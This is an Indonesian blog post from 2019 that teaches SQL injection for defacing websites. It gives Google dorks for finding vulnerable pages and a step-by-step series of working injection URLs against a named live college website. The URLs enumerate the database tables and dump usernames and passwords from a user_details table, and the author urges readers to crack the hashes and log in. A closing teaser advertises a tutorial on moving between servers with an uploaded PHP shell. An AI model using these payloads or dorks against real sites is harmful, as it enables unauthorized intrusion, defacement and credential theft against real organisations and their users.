Powered By Blogger

Minggu, 08 September 2019

Deface Metode Sql Injection ( Manual )

Hi Asalamualaikum Wr.Wb
Welcome Back Babi :v Kali Nih Ada Tutorial Deface Metode Sql Injection ( Manual ) Oke Gass Saja Udah Malem Mau Tidur :v
- Dork
- Roko
- Kopi
Dork : inurl:news.php?id= site:
inurl:gallery.php?id= site:
inurl:index.php?id= site:
( Kembangin Lagi )
Live Target : http://www.maldacollege.ac.in/current-news.php?id=35

Mula Mula Kasih Tanda ' di belakang Nya seperti Ni
http://www.maldacollege.ac.in/current-news.php?id=35'

Cari Sampai Eror Gan :v
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+1-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+2-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+3-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+4-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+5-- <- Eror

Berarti database nya 4 gan
Cara Selanjut nya union+select
http://www.maldacollege.ac.in/current-news.php?id=35+union+select1,2,3,4--
Nah Habis itu @@version atau version()  buat liat versi berapa sql nya
Angka Togel Nya 5 rebu gan :v Oke Lanjut tod
Habis itu group_concat(table_name) di angka muncul tadi dan

perintah +from+information_schema.tables+where+table_schema=database()--

di akhir angka jadi macam nih
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
Oke Lanjut Muncul Table Banyak Di Situ :v tahap selanjutnya mengekstrak kata2 yang mau di dump database nya di sini gw mau dump user_details setelah di etrax decimalnya adalah 757365725f64657461696c73
Bingung Cara Extrax Nya di sini  http://string-functions.com/string-hex.aspx
Nah Oke Lanjut Sekarang group_concat(column_name) <yang tadi nya table ganti jadi column dan di akhir angak tambahin

from+information_schema.columns+where+table_name=0xhasil luextra tadi--

jangan lupa mengugunakan 0x << itu
+from+nameyang tadi di dumb-- <- Yang di akhir angka jadi seperti itu
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,concat_ws(0x3a,user_name,user_password),3,4+from+user_details--
Keluar dah Babi Username Sama Password Nya Tinggal Kalian Hash Sendiri Login ? Di Itu keliatan hehe
Oke Bay Sekian Dulu
Good Bay Next To 😁

Tidak ada komentar:

Posting Komentar

Mantan PHP Backdoor

Welcome Back Bro. Kali Nih Adalah Tutorial Cara Jumping Ke Server Web Lain Yg Tersembunyi Pernah Kan Kalian Pas Udah Upload Shell Habis I...